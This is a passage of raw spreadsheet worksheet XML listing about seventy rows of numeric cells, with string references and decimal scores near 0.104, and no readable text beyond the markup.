    <row r="15472" ht="15.75" customHeight="1">
      <c r="A15472" s="1">
        <v>2078.0</v>
      </c>
      <c r="B15472" s="2">
        <v>3.1149657E7</v>
      </c>
      <c r="C15472" s="2" t="s">
        <v>14926</v>
      </c>
      <c r="D15472" s="2">
        <v>1.0</v>
      </c>
      <c r="E15472" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15472" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15473" ht="15.75" customHeight="1">
      <c r="A15473" s="1">
        <v>5052.0</v>
      </c>
      <c r="B15473" s="2">
        <v>4.4333131E7</v>
      </c>
      <c r="C15473" s="2" t="s">
        <v>14927</v>
      </c>
      <c r="D15473" s="2">
        <v>1.0</v>
      </c>
      <c r="E15473" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15473" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15474" ht="15.75" customHeight="1">
      <c r="A15474" s="1">
        <v>7537.0</v>
      </c>
      <c r="B15474" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C15474" s="2" t="s">
        <v>14928</v>
      </c>
      <c r="D15474" s="2">
        <v>1.0</v>
      </c>
      <c r="E15474" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15474" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15475" ht="15.75" customHeight="1">
      <c r="A15475" s="1">
        <v>8250.0</v>
      </c>
      <c r="B15475" s="2">
        <v>5.3379106E7</v>
      </c>
      <c r="C15475" s="2" t="s">
        <v>14929</v>
      </c>
      <c r="D15475" s="2">
        <v>1.0</v>
      </c>
      <c r="E15475" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15475" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15476" ht="15.75" customHeight="1">
      <c r="A15476" s="1">
        <v>14322.0</v>
      </c>
      <c r="B15476" s="2">
        <v>3.870626E7</v>
      </c>
      <c r="C15476" s="2" t="s">
        <v>14930</v>
      </c>
      <c r="D15476" s="2">
        <v>1.0</v>
      </c>
      <c r="E15476" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15476" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15477" ht="15.75" customHeight="1">
      <c r="A15477" s="1">
        <v>14980.0</v>
      </c>
      <c r="B15477" s="2">
        <v>4.1383126E7</v>
      </c>
      <c r="C15477" s="2" t="s">
        <v>14931</v>
      </c>
      <c r="D15477" s="2">
        <v>1.0</v>
      </c>
      <c r="E15477" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15477" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15478" ht="15.75" customHeight="1">
      <c r="A15478" s="1">
        <v>16301.0</v>
      </c>
      <c r="B15478" s="2">
        <v>4.590715E7</v>
      </c>
      <c r="C15478" s="2" t="s">
        <v>14932</v>
      </c>
      <c r="D15478" s="2">
        <v>1.0</v>
      </c>
      <c r="E15478" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15478" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15479" ht="15.75" customHeight="1">
      <c r="A15479" s="1">
        <v>17885.0</v>
      </c>
      <c r="B15479" s="2">
        <v>5.1053654E7</v>
      </c>
      <c r="C15479" s="2" t="s">
        <v>14933</v>
      </c>
      <c r="D15479" s="2">
        <v>1.0</v>
      </c>
      <c r="E15479" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15479" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15480" ht="15.75" customHeight="1">
      <c r="A15480" s="1">
        <v>18844.0</v>
      </c>
      <c r="B15480" s="2">
        <v>5.3967878E7</v>
      </c>
      <c r="C15480" s="2" t="s">
        <v>14934</v>
      </c>
      <c r="D15480" s="2">
        <v>1.0</v>
      </c>
      <c r="E15480" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15480" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15481" ht="15.75" customHeight="1">
      <c r="A15481" s="1">
        <v>18845.0</v>
      </c>
      <c r="B15481" s="2">
        <v>5.3967878E7</v>
      </c>
      <c r="C15481" s="2" t="s">
        <v>14935</v>
      </c>
      <c r="D15481" s="2">
        <v>1.0</v>
      </c>
      <c r="E15481" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15481" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15482" ht="15.75" customHeight="1">
      <c r="A15482" s="1">
        <v>19326.0</v>
      </c>
      <c r="B15482" s="2">
        <v>5.5308727E7</v>
      </c>
      <c r="C15482" s="2" t="s">
        <v>14936</v>
      </c>
      <c r="D15482" s="2">
        <v>1.0</v>
      </c>
      <c r="E15482" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15482" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15483" ht="15.75" customHeight="1">
      <c r="A15483" s="1">
        <v>20454.0</v>
      </c>
      <c r="B15483" s="2">
        <v>1.2532284E7</v>
      </c>
      <c r="C15483" s="2" t="s">
        <v>14937</v>
      </c>
      <c r="D15483" s="2">
        <v>1.0</v>
      </c>
      <c r="E15483" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15483" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15484" ht="15.75" customHeight="1">
      <c r="A15484" s="1">
        <v>21121.0</v>
      </c>
      <c r="B15484" s="2">
        <v>1.8315149E7</v>
      </c>
      <c r="C15484" s="2" t="s">
        <v>14938</v>
      </c>
      <c r="D15484" s="2">
        <v>1.0</v>
      </c>
      <c r="E15484" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15484" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15485" ht="15.75" customHeight="1">
      <c r="A15485" s="1">
        <v>27682.0</v>
      </c>
      <c r="B15485" s="2">
        <v>2.2972405E7</v>
      </c>
      <c r="C15485" s="2" t="s">
        <v>14939</v>
      </c>
      <c r="D15485" s="2">
        <v>1.0</v>
      </c>
      <c r="E15485" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15485" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15486" ht="15.75" customHeight="1">
      <c r="A15486" s="1">
        <v>29095.0</v>
      </c>
      <c r="B15486" s="2">
        <v>3.0392336E7</v>
      </c>
      <c r="C15486" s="2" t="s">
        <v>14940</v>
      </c>
      <c r="D15486" s="2">
        <v>1.0</v>
      </c>
      <c r="E15486" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15486" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15487" ht="15.75" customHeight="1">
      <c r="A15487" s="1">
        <v>32253.0</v>
      </c>
      <c r="B15487" s="2">
        <v>5.5086566E7</v>
      </c>
      <c r="C15487" s="2" t="s">
        <v>14941</v>
      </c>
      <c r="D15487" s="2">
        <v>1.0</v>
      </c>
      <c r="E15487" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15487" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15488" ht="15.75" customHeight="1">
      <c r="A15488" s="1">
        <v>33708.0</v>
      </c>
      <c r="B15488" s="2">
        <v>8489081.0</v>
      </c>
      <c r="C15488" s="2" t="s">
        <v>14942</v>
      </c>
      <c r="D15488" s="2">
        <v>1.0</v>
      </c>
      <c r="E15488" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15488" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="15489" ht="15.75" customHeight="1">
      <c r="A15489" s="1">
        <v>12791.0</v>
      </c>
      <c r="B15489" s="2">
        <v>3.1391453E7</v>
      </c>
      <c r="C15489" s="2" t="s">
        <v>14943</v>
      </c>
      <c r="D15489" s="2">
        <v>1.0</v>
      </c>
      <c r="E15489" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15489" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="15490" ht="15.75" customHeight="1">
      <c r="A15490" s="1">
        <v>20376.0</v>
      </c>
      <c r="B15490" s="2">
        <v>1.1836648E7</v>
      </c>
      <c r="C15490" s="2" t="s">
        <v>14944</v>
      </c>
      <c r="D15490" s="2">
        <v>1.0</v>
      </c>
      <c r="E15490" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15490" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="15491" ht="15.75" customHeight="1">
      <c r="A15491" s="1">
        <v>32056.0</v>
      </c>
      <c r="B15491" s="2">
        <v>5.3766124E7</v>
      </c>
      <c r="C15491" s="2" t="s">
        <v>14945</v>
      </c>
      <c r="D15491" s="2">
        <v>1.0</v>
      </c>
      <c r="E15491" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15491" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="15492" ht="15.75" customHeight="1">
      <c r="A15492" s="1">
        <v>3279.0</v>
      </c>
      <c r="B15492" s="2">
        <v>3.7486296E7</v>
      </c>
      <c r="C15492" s="2" t="s">
        <v>14946</v>
      </c>
      <c r="D15492" s="2">
        <v>1.0</v>
      </c>
      <c r="E15492" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15492" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="15493" ht="15.75" customHeight="1">
      <c r="A15493" s="1">
        <v>8746.0</v>
      </c>
      <c r="B15493" s="2">
        <v>5.4540187E7</v>
      </c>
      <c r="C15493" s="2" t="s">
        <v>14947</v>
      </c>
      <c r="D15493" s="2">
        <v>1.0</v>
      </c>
      <c r="E15493" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15493" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="15494" ht="15.75" customHeight="1">
      <c r="A15494" s="1">
        <v>8869.0</v>
      </c>
      <c r="B15494" s="2">
        <v>5.4745576E7</v>
      </c>
      <c r="C15494" s="2" t="s">
        <v>14948</v>
      </c>
      <c r="D15494" s="2">
        <v>1.0</v>
      </c>
      <c r="E15494" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15494" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="15495" ht="15.75" customHeight="1">
      <c r="A15495" s="1">
        <v>9057.0</v>
      </c>
      <c r="B15495" s="2">
        <v>5.5097678E7</v>
      </c>
      <c r="C15495" s="2" t="s">
        <v>14949</v>
      </c>
      <c r="D15495" s="2">
        <v>1.0</v>
      </c>
      <c r="E15495" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15495" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="15496" ht="15.75" customHeight="1">
      <c r="A15496" s="1">
        <v>12637.0</v>
      </c>
      <c r="B15496" s="2">
        <v>3.0323916E7</v>
      </c>
      <c r="C15496" s="2" t="s">
        <v>14950</v>
      </c>
      <c r="D15496" s="2">
        <v>1.0</v>
      </c>
      <c r="E15496" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15496" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="15497" ht="15.75" customHeight="1">
      <c r="A15497" s="1">
        <v>14747.0</v>
      </c>
      <c r="B15497" s="2">
        <v>4.0737466E7</v>
      </c>
      <c r="C15497" s="2" t="s">
        <v>14951</v>
      </c>
      <c r="D15497" s="2">
        <v>1.0</v>
      </c>
      <c r="E15497" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15497" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="15498" ht="15.75" customHeight="1">
      <c r="A15498" s="1">
        <v>31753.0</v>
      </c>
      <c r="B15498" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C15498" s="2" t="s">
        <v>14952</v>
      </c>
      <c r="D15498" s="2">
        <v>1.0</v>
      </c>
      <c r="E15498" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15498" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="15499" ht="15.75" customHeight="1">
      <c r="A15499" s="1">
        <v>64.0</v>
      </c>
      <c r="B15499" s="2">
        <v>1.1303396E7</v>
      </c>
      <c r="C15499" s="2" t="s">
        <v>14953</v>
      </c>
      <c r="D15499" s="2">
        <v>1.0</v>
      </c>
      <c r="E15499" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15499" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="15500" ht="15.75" customHeight="1">
      <c r="A15500" s="1">
        <v>21214.0</v>
      </c>
      <c r="B15500" s="2">
        <v>1.959084E7</v>
      </c>
      <c r="C15500" s="2" t="s">
        <v>14656</v>
      </c>
      <c r="D15500" s="2">
        <v>1.0</v>
      </c>
      <c r="E15500" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15500" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="15501" ht="15.75" customHeight="1">
      <c r="A15501" s="1">
        <v>16324.0</v>
      </c>
      <c r="B15501" s="2">
        <v>4.5992601E7</v>
      </c>
      <c r="C15501" s="2" t="s">
        <v>14954</v>
      </c>
      <c r="D15501" s="2">
        <v>1.0</v>
      </c>
      <c r="E15501" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15501" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="15502" ht="15.75" customHeight="1">
      <c r="A15502" s="1">
        <v>455.0</v>
      </c>
      <c r="B15502" s="2">
        <v>1.7235945E7</v>
      </c>
      <c r="C15502" s="2" t="s">
        <v>14955</v>
      </c>
      <c r="D15502" s="2">
        <v>1.0</v>
      </c>
      <c r="E15502" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15502" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15503" ht="15.75" customHeight="1">
      <c r="A15503" s="1">
        <v>1808.0</v>
      </c>
      <c r="B15503" s="2">
        <v>2.9188092E7</v>
      </c>
      <c r="C15503" s="2" t="s">
        <v>14956</v>
      </c>
      <c r="D15503" s="2">
        <v>1.0</v>
      </c>
      <c r="E15503" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15503" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15504" ht="15.75" customHeight="1">
      <c r="A15504" s="1">
        <v>4151.0</v>
      </c>
      <c r="B15504" s="2">
        <v>4.1442266E7</v>
      </c>
      <c r="C15504" s="2" t="s">
        <v>14957</v>
      </c>
      <c r="D15504" s="2">
        <v>1.0</v>
      </c>
      <c r="E15504" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15504" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15505" ht="15.75" customHeight="1">
      <c r="A15505" s="1">
        <v>4542.0</v>
      </c>
      <c r="B15505" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C15505" s="2" t="s">
        <v>14958</v>
      </c>
      <c r="D15505" s="2">
        <v>1.0</v>
      </c>
      <c r="E15505" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15505" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15506" ht="15.75" customHeight="1">
      <c r="A15506" s="1">
        <v>5335.0</v>
      </c>
      <c r="B15506" s="2">
        <v>4.5326959E7</v>
      </c>
      <c r="C15506" s="2" t="s">
        <v>14959</v>
      </c>
      <c r="D15506" s="2">
        <v>1.0</v>
      </c>
      <c r="E15506" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15506" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15507" ht="15.75" customHeight="1">
      <c r="A15507" s="1">
        <v>5414.0</v>
      </c>
      <c r="B15507" s="2">
        <v>4.5524814E7</v>
      </c>
      <c r="C15507" s="2" t="s">
        <v>14960</v>
      </c>
      <c r="D15507" s="2">
        <v>1.0</v>
      </c>
      <c r="E15507" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15507" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15508" ht="15.75" customHeight="1">
      <c r="A15508" s="1">
        <v>7117.0</v>
      </c>
      <c r="B15508" s="2">
        <v>5.038896E7</v>
      </c>
      <c r="C15508" s="2" t="s">
        <v>14961</v>
      </c>
      <c r="D15508" s="2">
        <v>1.0</v>
      </c>
      <c r="E15508" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15508" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15509" ht="15.75" customHeight="1">
      <c r="A15509" s="1">
        <v>11739.0</v>
      </c>
      <c r="B15509" s="2">
        <v>2.405194E7</v>
      </c>
      <c r="C15509" s="2" t="s">
        <v>14962</v>
      </c>
      <c r="D15509" s="2">
        <v>1.0</v>
      </c>
      <c r="E15509" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15509" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15510" ht="15.75" customHeight="1">
      <c r="A15510" s="1">
        <v>22238.0</v>
      </c>
      <c r="B15510" s="2">
        <v>3.2540622E7</v>
      </c>
      <c r="C15510" s="2" t="s">
        <v>14963</v>
      </c>
      <c r="D15510" s="2">
        <v>1.0</v>
      </c>
      <c r="E15510" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15510" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15511" ht="15.75" customHeight="1">
      <c r="A15511" s="1">
        <v>29489.0</v>
      </c>
      <c r="B15511" s="2">
        <v>3.2550254E7</v>
      </c>
      <c r="C15511" s="2" t="s">
        <v>14964</v>
      </c>
      <c r="D15511" s="2">
        <v>1.0</v>
      </c>
      <c r="E15511" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15511" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15512" ht="15.75" customHeight="1">
      <c r="A15512" s="1">
        <v>32100.0</v>
      </c>
      <c r="B15512" s="2">
        <v>5.4016806E7</v>
      </c>
      <c r="C15512" s="2" t="s">
        <v>14965</v>
      </c>
      <c r="D15512" s="2">
        <v>1.0</v>
      </c>
      <c r="E15512" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15512" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="15513" ht="15.75" customHeight="1">
      <c r="A15513" s="1">
        <v>2143.0</v>
      </c>
      <c r="B15513" s="2">
        <v>3.1617292E7</v>
      </c>
      <c r="C15513" s="2" t="s">
        <v>14966</v>
      </c>
      <c r="D15513" s="2">
        <v>1.0</v>
      </c>
      <c r="E15513" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15513" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15514" ht="15.75" customHeight="1">
      <c r="A15514" s="1">
        <v>8795.0</v>
      </c>
      <c r="B15514" s="2">
        <v>5.4601717E7</v>
      </c>
      <c r="C15514" s="2" t="s">
        <v>14967</v>
      </c>
      <c r="D15514" s="2">
        <v>1.0</v>
      </c>
      <c r="E15514" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15514" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15515" ht="15.75" customHeight="1">
      <c r="A15515" s="1">
        <v>15319.0</v>
      </c>
      <c r="B15515" s="2">
        <v>4.251409E7</v>
      </c>
      <c r="C15515" s="2" t="s">
        <v>14968</v>
      </c>
      <c r="D15515" s="2">
        <v>1.0</v>
      </c>
      <c r="E15515" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15515" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15516" ht="15.75" customHeight="1">
      <c r="A15516" s="1">
        <v>15710.0</v>
      </c>
      <c r="B15516" s="2">
        <v>4.396539E7</v>
      </c>
      <c r="C15516" s="2" t="s">
        <v>14969</v>
      </c>
      <c r="D15516" s="2">
        <v>1.0</v>
      </c>
      <c r="E15516" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15516" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15517" ht="15.75" customHeight="1">
      <c r="A15517" s="1">
        <v>16074.0</v>
      </c>
      <c r="B15517" s="2">
        <v>4.5327034E7</v>
      </c>
      <c r="C15517" s="2" t="s">
        <v>14970</v>
      </c>
      <c r="D15517" s="2">
        <v>1.0</v>
      </c>
      <c r="E15517" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15517" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15518" ht="15.75" customHeight="1">
      <c r="A15518" s="1">
        <v>17059.0</v>
      </c>
      <c r="B15518" s="2">
        <v>4.8553213E7</v>
      </c>
      <c r="C15518" s="2" t="s">
        <v>14971</v>
      </c>
      <c r="D15518" s="2">
        <v>1.0</v>
      </c>
      <c r="E15518" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15518" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15519" ht="15.75" customHeight="1">
      <c r="A15519" s="1">
        <v>17516.0</v>
      </c>
      <c r="B15519" s="2">
        <v>5.0034542E7</v>
      </c>
      <c r="C15519" s="2" t="s">
        <v>14972</v>
      </c>
      <c r="D15519" s="2">
        <v>1.0</v>
      </c>
      <c r="E15519" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15519" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15520" ht="15.75" customHeight="1">
      <c r="A15520" s="1">
        <v>27627.0</v>
      </c>
      <c r="B15520" s="2">
        <v>2.2701103E7</v>
      </c>
      <c r="C15520" s="2" t="s">
        <v>14973</v>
      </c>
      <c r="D15520" s="2">
        <v>1.0</v>
      </c>
      <c r="E15520" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15520" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15521" ht="15.75" customHeight="1">
      <c r="A15521" s="1">
        <v>30212.0</v>
      </c>
      <c r="B15521" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C15521" s="2" t="s">
        <v>14974</v>
      </c>
      <c r="D15521" s="2">
        <v>1.0</v>
      </c>
      <c r="E15521" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15521" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15522" ht="15.75" customHeight="1">
      <c r="A15522" s="1">
        <v>30517.0</v>
      </c>
      <c r="B15522" s="2">
        <v>4.0134333E7</v>
      </c>
      <c r="C15522" s="2" t="s">
        <v>14975</v>
      </c>
      <c r="D15522" s="2">
        <v>1.0</v>
      </c>
      <c r="E15522" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15522" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="15523" ht="15.75" customHeight="1">
      <c r="A15523" s="1">
        <v>854.0</v>
      </c>
      <c r="B15523" s="2">
        <v>2.1716426E7</v>
      </c>
      <c r="C15523" s="2" t="s">
        <v>14976</v>
      </c>
      <c r="D15523" s="2">
        <v>1.0</v>
      </c>
      <c r="E15523" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15523" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15524" ht="15.75" customHeight="1">
      <c r="A15524" s="1">
        <v>1264.0</v>
      </c>
      <c r="B15524" s="2">
        <v>2.5259925E7</v>
      </c>
      <c r="C15524" s="2" t="s">
        <v>14977</v>
      </c>
      <c r="D15524" s="2">
        <v>1.0</v>
      </c>
      <c r="E15524" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15524" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15525" ht="15.75" customHeight="1">
      <c r="A15525" s="1">
        <v>5721.0</v>
      </c>
      <c r="B15525" s="2">
        <v>4.6591648E7</v>
      </c>
      <c r="C15525" s="2" t="s">
        <v>14978</v>
      </c>
      <c r="D15525" s="2">
        <v>1.0</v>
      </c>
      <c r="E15525" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15525" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15526" ht="15.75" customHeight="1">
      <c r="A15526" s="1">
        <v>9418.0</v>
      </c>
      <c r="B15526" s="2">
        <v>5.5794304E7</v>
      </c>
      <c r="C15526" s="2" t="s">
        <v>14979</v>
      </c>
      <c r="D15526" s="2">
        <v>1.0</v>
      </c>
      <c r="E15526" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15526" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15527" ht="15.75" customHeight="1">
      <c r="A15527" s="1">
        <v>10191.0</v>
      </c>
      <c r="B15527" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C15527" s="2" t="s">
        <v>14980</v>
      </c>
      <c r="D15527" s="2">
        <v>1.0</v>
      </c>
      <c r="E15527" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15527" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15528" ht="15.75" customHeight="1">
      <c r="A15528" s="1">
        <v>12943.0</v>
      </c>
      <c r="B15528" s="2">
        <v>3.2375855E7</v>
      </c>
      <c r="C15528" s="2" t="s">
        <v>14981</v>
      </c>
      <c r="D15528" s="2">
        <v>1.0</v>
      </c>
      <c r="E15528" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15528" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15529" ht="15.75" customHeight="1">
      <c r="A15529" s="1">
        <v>14128.0</v>
      </c>
      <c r="B15529" s="2">
        <v>3.789356E7</v>
      </c>
      <c r="C15529" s="2" t="s">
        <v>14982</v>
      </c>
      <c r="D15529" s="2">
        <v>1.0</v>
      </c>
      <c r="E15529" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15529" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15530" ht="15.75" customHeight="1">
      <c r="A15530" s="1">
        <v>15030.0</v>
      </c>
      <c r="B15530" s="2">
        <v>4.1555772E7</v>
      </c>
      <c r="C15530" s="2" t="s">
        <v>14983</v>
      </c>
      <c r="D15530" s="2">
        <v>1.0</v>
      </c>
      <c r="E15530" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15530" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15531" ht="15.75" customHeight="1">
      <c r="A15531" s="1">
        <v>17514.0</v>
      </c>
      <c r="B15531" s="2">
        <v>5.0032609E7</v>
      </c>
      <c r="C15531" s="2" t="s">
        <v>14984</v>
      </c>
      <c r="D15531" s="2">
        <v>1.0</v>
      </c>
      <c r="E15531" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15531" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="15532" ht="15.75" customHeight="1">
      <c r="A15532" s="1">
        <v>1970.0</v>
      </c>
      <c r="B15532" s="2">
        <v>3.0386989E7</v>
      </c>
      <c r="C15532" s="2" t="s">
        <v>14985</v>
      </c>
      <c r="D15532" s="2">
        <v>1.0</v>
      </c>
      <c r="E15532" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15532" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="15533" ht="15.75" customHeight="1">
      <c r="A15533" s="1">
        <v>9772.0</v>
      </c>
      <c r="B15533" s="2">
        <v>5.650134E7</v>
      </c>
      <c r="C15533" s="2" t="s">
        <v>14986</v>
      </c>
      <c r="D15533" s="2">
        <v>1.0</v>
      </c>
      <c r="E15533" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15533" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="15534" ht="15.75" customHeight="1">
      <c r="A15534" s="1">
        <v>11342.0</v>
      </c>
      <c r="B15534" s="2">
        <v>2.1219859E7</v>
      </c>
      <c r="C15534" s="2" t="s">
        <v>14987</v>
      </c>
      <c r="D15534" s="2">
        <v>1.0</v>
      </c>
      <c r="E15534" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15534" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="15535" ht="15.75" customHeight="1">
      <c r="A15535" s="1">
        <v>22710.0</v>
      </c>
      <c r="B15535" s="2">
        <v>4.311612E7</v>
      </c>
      <c r="C15535" s="2" t="s">
        <v>14988</v>
      </c>
      <c r="D15535" s="2">
        <v>1.0</v>
      </c>
      <c r="E15535" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15535" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="15536" ht="15.75" customHeight="1">
      <c r="A15536" s="1">
        <v>2518.0</v>
      </c>
      <c r="B15536" s="2">
        <v>3.4001642E7</v>
      </c>
      <c r="C15536" s="2" t="s">
        <v>14989</v>
      </c>
      <c r="D15536" s="2">
        <v>1.0</v>
      </c>
      <c r="E15536" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15536" s="2">
        <v>0.1035353535353535</v>
      </c>
    </row>
    <row r="15537" ht="15.75" customHeight="1">
      <c r="A15537" s="1">
        <v>10558.0</v>
      </c>
      <c r="B15537" s="2">
        <v>1.2686449E7</v>
      </c>
      <c r="C15537" s="2" t="s">
        <v>14990</v>
      </c>
      <c r="D15537" s="2">
        <v>1.0</v>
      </c>
      <c r="E15537" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15537" s="2">
        <v>0.1032986111111111</v>
      </c>
    </row>
    <row r="15538" ht="15.75" customHeight="1">
      <c r="A15538" s="1">
        <v>29112.0</v>
      </c>
      <c r="B15538" s="2">
        <v>3.043397E7</v>
      </c>
      <c r="C15538" s="2" t="s">
        <v>14991</v>
      </c>
      <c r="D15538" s="2">
        <v>1.0</v>
      </c>
      <c r="E15538" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15538" s="2">
        <v>0.1032986111111111</v>
      </c>
    </row>
